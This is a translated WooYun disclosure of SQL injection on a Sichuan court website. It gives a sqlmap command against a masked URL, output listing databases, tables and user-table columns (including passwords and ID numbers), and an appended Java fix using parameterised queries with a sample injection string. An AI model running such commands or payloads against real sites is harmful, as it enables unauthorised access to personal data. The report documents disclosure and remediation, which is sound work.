Vulnerability summary

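Bug ID: wooyun-2015-0139500

Title: SQL injection at the Intermediate People's Court of Guang'an City, Sichuan

Vendor: Intermediate People's Court of Guang'an City, Sichuan

Author: 冷白开。

Submitted: 2015-09-09 14:13

Fixed: 2015-10-26 13:54

Published: 2015-10-26 13:54

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 10

Status: Handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]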


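Vulnerability details

Disclosure status:

2015-09-09: Details sent to the vendor; awaiting vendor action
2015-09-11: CNCERT has not yet been able to reach the organization concerned; details disclosed only to the notifying agencies
2015-09-21: Details disclosed to core white hats and experts in related fields
2015-10-01: Details disclosed to regular white hats
2015-10-11: Details disclosed to intern white hats
2015-10-26: Details disclosed to the public

Brief description:

SQL injection at the Intermediate People's Court of Guang'an City, Sichuan

Detailed description:

Injection command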

sqlmap.py -u "http://**.**.**.**/news_videos.jsp?classId=0207" --dbs

Dumping a little data to prove the issue exists

available databases [12]:
[*] AdventureWorks
[*] AdventureWorksDW
[*] ermyyla
[*] gacourt
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] webdb_gazycpws
[*] webdb_gazyww
Database: gacourt
[76 tables]
+--------------------------+
| MAILTYPE |
| MAILTYPE |
| MAILTYPE_SMALL |
| MAILTYPE_SMALL |
| SZXX |
| SZXX |
| SZXX_ACCEPTED |
| SZXX_ACCEPTED |
| T_HRS_DEPARTMENT |
| T_HRS_DEPARTMENT |
| T_HRS_ORGANIZATION |
| T_HRS_ORGANIZATION |
| T_MESSAGE |
| T_MESSAGE |
| T_SYSEIP_MENU |
| T_SYSEIP_MENU |
| T_SYSEIP_PERMISSION |
| T_SYSEIP_PERMISSION |
| T_SYSEIP_ROLE_PERMISSION |
| T_SYSEIP_ROLE_PERMISSION |
| T_SYS_LOG_LOGIN |
| T_SYS_LOG_LOGIN |
| T_SYS_LOG_OPER |
| T_SYS_LOG_OPER |
| T_SYS_ROLE |
| T_SYS_ROLE |
| T_SYS_USER |
| T_SYS_USER |
| T_SYS_USER_ROLE |
| T_SYS_USER_ROLE |
| UCOMMENT |
| UCOMMENT |
| UCOMMENTUSER |
| UCOMMENTUSER |
| UCOMMENTVIEW |
| UCOMMENTVIEW |
| UENTERPRISEMENU |
| UENTERPRISEMENU |
| UFIRSTMENU |
| UFIRSTMENU |
| ULETTER_PURPOSE |
| ULETTER_PURPOSE |
| ULINK |
| ULINK |
| ULINKVIEW |
| ULINKVIEW |
| UMESSAGE |
| UMESSAGE |
| UNEWS |
| UNEWS |
| UNEWSADDUCTION |
| UNEWSADDUCTION |
| UNEWSVIEW |
| UNEWSVIEW |
| UOPINFO |
| UOPINFO |
| UPARAMETER |
| UPARAMETER |
| USECONDMENU |
| USECONDMENU |
| UUNIT |
| UUNIT |
| UUSER |
| UUSER |
| UUSERVIEW |
| UUSERVIEW |
| V_SZXX_DEAL |
| V_SZXX_DEAL |
| gacourtatt |
| gacourtatt |
| log |
| log |
| portaluser |
| portaluser |
| sqlmapoutput |
| sqlmapoutput |
+--------------------------+
Database: gacourt
Table: UUSER
[44 columns]
+--------------------+---------+
| Column | Type |
+--------------------+---------+
| ADDRESS | varchar |
| ADDRIGHTS | varchar |
| ADDRIGHTS1 | varchar |
| AUDITINGRIGHTS | varchar |
| BROWSERIGHTS | varchar |
| DELRIGHTS | varchar |
| DELRIGHTS1 | varchar |
| EDITRIGHTS | varchar |
| EDITRIGHTS1 | varchar |
| EMAIL | varchar |
| ENTERPRISERIGHTS | varchar |
| IDCARD | varchar |
| IDS | varchar |
| INHERITRIGHTS | numeric |
| ISMANAGER | numeric |
| ISONLINE | int |
| ISSUERIGHTS | varchar |
| LOGIN | varchar |
| MSN | varchar |
| NAME | varchar |
| OPEN_LOGIN | varchar |
| OPEN_PWD | varchar |
| PHOTO | varchar |
| PIC | varchar |
| POSTCODE | varchar |
| PWD | varchar |
| QQ | varchar |
| REGTIME | varchar |
| REMARK | varchar |
| RIGHTS | varchar |
| sendbackrights | varchar |
| SEX | varchar |
| STATE | numeric |
| TEL | varchar |
| UNITNO | varchar |
| USERNO | numeric |
| USERNO_BAK | float |
| WELCOME | varchar |
| YCYWADDRIGHTS | varchar |
| YCYWAUDITINGRIGHTS | varchar |
| YCYWBROWSERIGHTS | varchar |
| YCYWDELRIGHTS | varchar |
| YCYWEDITRIGHTS | varchar |
| YCYWRIGHTS | varchar |
+--------------------+---------+

As for the passwords... I couldn't decrypt them....

Proof of vulnerability:

See above

Remediation:

You know what to do

Copyright notice: please credit the source when reposting: 冷白开。@WooYun
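
The report gives no remediation detail, so the following is an added example (not code from the affected site or from the report's author) of the usual fix for an injectable parameter such as classId in a JSP application: an allow-list check plus a bound parameter. The table NEWS_VIDEO, the columns TITLE and CLASS_ID, and the digits-only format of classId are assumptions; the page does not show the server-side code.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Pattern;

public class NewsVideoQuery {
    // Assumption: class ids are short digit strings such as "0207".
    private static final Pattern CLASS_ID = Pattern.compile("[0-9]{1,8}");

    // Vulnerable pattern (for contrast): the parameter becomes part of the SQL text.
    static String concatenatedSql(String classId) {
        return "SELECT TITLE FROM NEWS_VIDEO WHERE CLASS_ID = '" + classId + "'";
    }

    // Allow-list check performed before the value reaches the database layer.
    static boolean isValidClassId(String classId) {
        return classId != null && CLASS_ID.matcher(classId).matches();
    }

    // Hardened form: the SQL text is fixed and the value is bound as data.
    static List<String> findTitles(Connection conn, String classId) throws SQLException {
        if (!isValidClassId(classId)) {
            throw new IllegalArgumentException("invalid classId");
        }
        String sql = "SELECT TITLE FROM NEWS_VIDEO WHERE CLASS_ID = ?";
        List<String> titles = new ArrayList<>();
        try (PreparedStatement ps = conn.prepareStatement(sql)) {
            ps.setString(1, classId);
            try (ResultSet rs = ps.executeQuery()) {
                while (rs.next()) {
                    titles.add(rs.getString("TITLE"));
                }
            }
        }
        return titles;
    }

    public static void main(String[] args) {
        // Constructed inputs: a normal id and one that changes the concatenated statement.
        String[] samples = {"0207", "0207' OR '1'='1"};
        for (String s : samples) {
            System.out.println(isValidClassId(s) + " | " + concatenatedSql(s));
        }
    }
}
```

Running `main` needs no database: it prints the validation result next to the statement the concatenating form would have sent, which shows the second input rewriting the WHERE clause while the allow-list rejects it.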


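Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-09-11 13:52

Vendor reply:

CNVD confirmed and reproduced the reported issue and has passed it to CNCERT, which forwarded it to the Sichuan branch center for follow-up coordination with the organization that manages the website.

Latest status:

None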